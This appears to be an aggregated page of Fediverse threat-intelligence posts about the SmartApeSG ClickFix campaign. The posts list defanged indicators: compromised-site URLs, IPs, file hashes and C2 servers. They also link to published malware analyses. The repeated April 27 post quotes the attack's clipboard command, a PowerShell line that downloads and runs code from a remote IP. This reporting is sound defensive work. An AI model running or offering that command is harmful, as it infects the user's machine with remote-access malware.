#smartapesg — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #smartapesg, aggregated by home.social.
-
2026-05-22 (Friday): #SmartApeSG --> Unidentified #RAT --> #NetSupport RAT
A #pcap of the traffic, associated files, and a list of IOCs are available at https://www.malware-traffic-analysis.net/2026/05/22/index.html
cc: @netresec this is the post that I promised earlier. I'm not able to get the infection chain in any sandbox.
-
2026-05-22 (Friday): #SmartApeSG --> Unidentified #RAT --> #NetSupport RAT
A #pcap of the traffic, associated files, and a list of IOCs are available at https://www.malware-traffic-analysis.net/2026/05/22/index.html
cc: @netresec this is the post that I promised earlier. I'm not able to get the infection chain in any sandbox.
-
2026-05-22 (Friday): #SmartApeSG --> Unidentified #RAT --> #NetSupport RAT
A #pcap of the traffic, associated files, and a list of IOCs are available at https://www.malware-traffic-analysis.net/2026/05/22/index.html
cc: @netresec this is the post that I promised earlier. I'm not able to get the infection chain in any sandbox.
-
2026-05-22 (Friday): #SmartApeSG --> Unidentified #RAT --> #NetSupport RAT
A #pcap of the traffic, associated files, and a list of IOCs are available at https://www.malware-traffic-analysis.net/2026/05/22/index.html
cc: @netresec this is the post that I promised earlier. I'm not able to get the infection chain in any sandbox.
-
2026-05-22 (Friday): #SmartApeSG --> Unidentified #RAT --> #NetSupport RAT
A #pcap of the traffic, associated files, and a list of IOCs are available at https://www.malware-traffic-analysis.net/2026/05/22/index.html
cc: @netresec this is the post that I promised earlier. I'm not able to get the infection chain in any sandbox.
-
@netresec @monitorsg I'll post something here today with the updated info. The legitimate but compromised nhanhoa[.]org can kick off this infection chain, which I tried in my lab today and saw thunderplanethub[.]top as the #SmartApeSG domain
-
@netresec @monitorsg I'll post something here today with the updated info. The legitimate but compromised nhanhoa[.]org can kick off this infection chain, which I tried in my lab today and saw thunderplanethub[.]top as the #SmartApeSG domain
-
@netresec @monitorsg I'll post something here today with the updated info. The legitimate but compromised nhanhoa[.]org can kick off this infection chain, which I tried in my lab today and saw thunderplanethub[.]top as the #SmartApeSG domain
-
@netresec @monitorsg I'll post something here today with the updated info. The legitimate but compromised nhanhoa[.]org can kick off this infection chain, which I tried in my lab today and saw thunderplanethub[.]top as the #SmartApeSG domain
-
@netresec @monitorsg I'll post something here today with the updated info. The legitimate but compromised nhanhoa[.]org can kick off this infection chain, which I tried in my lab today and saw thunderplanethub[.]top as the #SmartApeSG domain
-
2026-05-20 (Wednesday): #SmartApeSG #ClickFix activity
SMARTAPESG TRAFFIC TRIGGERED FROM LEGITIMATE BUT COMPROMISED SITE:
- hxxps[:]//vividanchorlab[.]top/auth/rate-script.js
- hxxps[:]//vividanchorlab[.]top/auth/dashboard-schema.php
- hxxps[:]//vividanchorlab[.]top/auth/routerr-client.jsTRAFFIC FROM RUNNING SMARTAPESG CLICKFIX TEXT:
- hxxp[:]//178.156.222[.]131/
- hxxp[:]//5.78.144[.]156/
- hxxps[:]//astralharborworks[.]com/groundSHA256 HASH FOR DOWNLOADED ZIP ARCHIVE:
- 6e3663c509debeda6c9f9faa260963973aa3e11f4fce21f9e8ff3ae45f785c20
POST-INFECTION C2 TRAFFIC:
- tcp://89.110.110[.]119:443
cc: @monitorsg
-
2026-05-20 (Wednesday): #SmartApeSG #ClickFix activity
SMARTAPESG TRAFFIC TRIGGERED FROM LEGITIMATE BUT COMPROMISED SITE:
- hxxps[:]//vividanchorlab[.]top/auth/rate-script.js
- hxxps[:]//vividanchorlab[.]top/auth/dashboard-schema.php
- hxxps[:]//vividanchorlab[.]top/auth/routerr-client.jsTRAFFIC FROM RUNNING SMARTAPESG CLICKFIX TEXT:
- hxxp[:]//178.156.222[.]131/
- hxxp[:]//5.78.144[.]156/
- hxxps[:]//astralharborworks[.]com/groundSHA256 HASH FOR DOWNLOADED ZIP ARCHIVE:
- 6e3663c509debeda6c9f9faa260963973aa3e11f4fce21f9e8ff3ae45f785c20
POST-INFECTION C2 TRAFFIC:
- tcp://89.110.110[.]119:443
cc: @monitorsg
-
2026-05-20 (Wednesday): #SmartApeSG #ClickFix activity
SMARTAPESG TRAFFIC TRIGGERED FROM LEGITIMATE BUT COMPROMISED SITE:
- hxxps[:]//vividanchorlab[.]top/auth/rate-script.js
- hxxps[:]//vividanchorlab[.]top/auth/dashboard-schema.php
- hxxps[:]//vividanchorlab[.]top/auth/routerr-client.jsTRAFFIC FROM RUNNING SMARTAPESG CLICKFIX TEXT:
- hxxp[:]//178.156.222[.]131/
- hxxp[:]//5.78.144[.]156/
- hxxps[:]//astralharborworks[.]com/groundSHA256 HASH FOR DOWNLOADED ZIP ARCHIVE:
- 6e3663c509debeda6c9f9faa260963973aa3e11f4fce21f9e8ff3ae45f785c20
POST-INFECTION C2 TRAFFIC:
- tcp://89.110.110[.]119:443
cc: @monitorsg
-
2026-05-20 (Wednesday): #SmartApeSG #ClickFix activity
SMARTAPESG TRAFFIC TRIGGERED FROM LEGITIMATE BUT COMPROMISED SITE:
- hxxps[:]//vividanchorlab[.]top/auth/rate-script.js
- hxxps[:]//vividanchorlab[.]top/auth/dashboard-schema.php
- hxxps[:]//vividanchorlab[.]top/auth/routerr-client.jsTRAFFIC FROM RUNNING SMARTAPESG CLICKFIX TEXT:
- hxxp[:]//178.156.222[.]131/
- hxxp[:]//5.78.144[.]156/
- hxxps[:]//astralharborworks[.]com/groundSHA256 HASH FOR DOWNLOADED ZIP ARCHIVE:
- 6e3663c509debeda6c9f9faa260963973aa3e11f4fce21f9e8ff3ae45f785c20
POST-INFECTION C2 TRAFFIC:
- tcp://89.110.110[.]119:443
cc: @monitorsg
-
2026-05-20 (Wednesday): #SmartApeSG #ClickFix activity
SMARTAPESG TRAFFIC TRIGGERED FROM LEGITIMATE BUT COMPROMISED SITE:
- hxxps[:]//vividanchorlab[.]top/auth/rate-script.js
- hxxps[:]//vividanchorlab[.]top/auth/dashboard-schema.php
- hxxps[:]//vividanchorlab[.]top/auth/routerr-client.jsTRAFFIC FROM RUNNING SMARTAPESG CLICKFIX TEXT:
- hxxp[:]//178.156.222[.]131/
- hxxp[:]//5.78.144[.]156/
- hxxps[:]//astralharborworks[.]com/groundSHA256 HASH FOR DOWNLOADED ZIP ARCHIVE:
- 6e3663c509debeda6c9f9faa260963973aa3e11f4fce21f9e8ff3ae45f785c20
POST-INFECTION C2 TRAFFIC:
- tcp://89.110.110[.]119:443
cc: @monitorsg
-
2026-04-27 (Monday):
Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)
Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/ioZip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365
#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/
-
2026-04-27 (Monday):
Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)
Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/ioZip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365
#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/
-
2026-04-27 (Monday):
Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)
Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/ioZip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365
#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/
-
2026-04-27 (Monday):
Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)
Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/ioZip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365
#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/
-
2026-04-27 (Monday):
Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)
Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/ioZip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365
#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/
-
2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.
I'm still not sure what this #malware is yet, but it looks like a RAT.
Details, some more images, and a #pcap of the traffic are available at https://www.malware-traffic-analysis.net/2026/04/23/index.html
-
2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.
I'm still not sure what this #malware is yet, but it looks like a RAT.
Details, some more images, and a #pcap of the traffic are available at https://www.malware-traffic-analysis.net/2026/04/23/index.html
-
2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.
I'm still not sure what this #malware is yet, but it looks like a RAT.
Details, some more images, and a #pcap of the traffic are available at https://www.malware-traffic-analysis.net/2026/04/23/index.html
-
2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.
I'm still not sure what this #malware is yet, but it looks like a RAT.
Details, some more images, and a #pcap of the traffic are available at https://www.malware-traffic-analysis.net/2026/04/23/index.html
-
2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.
I'm still not sure what this #malware is yet, but it looks like a RAT.
Details, some more images, and a #pcap of the traffic are available at https://www.malware-traffic-analysis.net/2026/04/23/index.html
-
@monitorsg - also saw possible #SmartApeSG on khaotixlab[.]top on 4/14/26.
-
@monitorsg - also saw possible #SmartApeSG on khaotixlab[.]top on 4/14/26.
-
@monitorsg - also saw possible #SmartApeSG on khaotixlab[.]top on 4/14/26.
-
2026-04-09 (Thursday): I found a site with inject script for both the #KongTuke and #SmartApeSG campaigns. Only got #SmartApeSG
Zip archive payload: c0d91df99b279ebfd952dadf0d1b94e436defa6bb59752cfad13777187f88553
Saw the same possible data exfiltration traffic to the same server at 89.110.110[.]119:443 that I saw from the previous payload from SmartApeSG campaign I reported on Monday 2026-04-06.
-
2026-04-09 (Thursday): I found a site with inject script for both the #KongTuke and #SmartApeSG campaigns. Only got #SmartApeSG
Zip archive payload: c0d91df99b279ebfd952dadf0d1b94e436defa6bb59752cfad13777187f88553
Saw the same possible data exfiltration traffic to the same server at 89.110.110[.]119:443 that I saw from the previous payload from SmartApeSG campaign I reported on Monday 2026-04-06.
-
2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.
A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at https://malware-traffic-analysis.net/2026/04/06/index.html
-
2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.
A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at https://malware-traffic-analysis.net/2026/04/06/index.html
-
2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.
A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at https://malware-traffic-analysis.net/2026/04/06/index.html
-
2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.
A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at https://malware-traffic-analysis.net/2026/04/06/index.html
-
2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.
A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at https://malware-traffic-analysis.net/2026/04/06/index.html
-
SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT (ArechClient2)
#SmartApeSG #RemcosRAT #Stealc #SecTopRAT
https://isc.sans.edu/diary/32826 -
SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT (ArechClient2)
#SmartApeSG #RemcosRAT #Stealc #SecTopRAT
https://isc.sans.edu/diary/32826 -
SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT (ArechClient2)
#SmartApeSG #RemcosRAT #Stealc #SecTopRAT
https://isc.sans.edu/diary/32826 -
SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT (ArechClient2)
#SmartApeSG #RemcosRAT #Stealc #SecTopRAT
https://isc.sans.edu/diary/32826 -
SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT (ArechClient2)
#SmartApeSG #RemcosRAT #Stealc #SecTopRAT
https://isc.sans.edu/diary/32826 -
ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://isc.sans.edu/diary/32826
-
ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://isc.sans.edu/diary/32826
-
ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://isc.sans.edu/diary/32826
-
SmartApeSG campaign uses ClickFix page to push Remcos RAT
#SmartApeSG #RemcosRAT
https://isc.sans.edu/diary/32796 -
SmartApeSG campaign uses ClickFix page to push Remcos RAT
#SmartApeSG #RemcosRAT
https://isc.sans.edu/diary/32796 -
SmartApeSG campaign uses ClickFix page to push Remcos RAT
#SmartApeSG #RemcosRAT
https://isc.sans.edu/diary/32796 -
SmartApeSG campaign uses ClickFix page to push Remcos RAT
#SmartApeSG #RemcosRAT
https://isc.sans.edu/diary/32796 -
SmartApeSG campaign uses ClickFix page to push Remcos RAT
#SmartApeSG #RemcosRAT
https://isc.sans.edu/diary/32796 -
ISC diary: #SmartApeSG campaign uses #ClickFix page to push #Remcos #RAT (#RemcosRAT) https://isc.sans.edu/diary/32796
-
ISC diary: #SmartApeSG campaign uses #ClickFix page to push #Remcos #RAT (#RemcosRAT) https://isc.sans.edu/diary/32796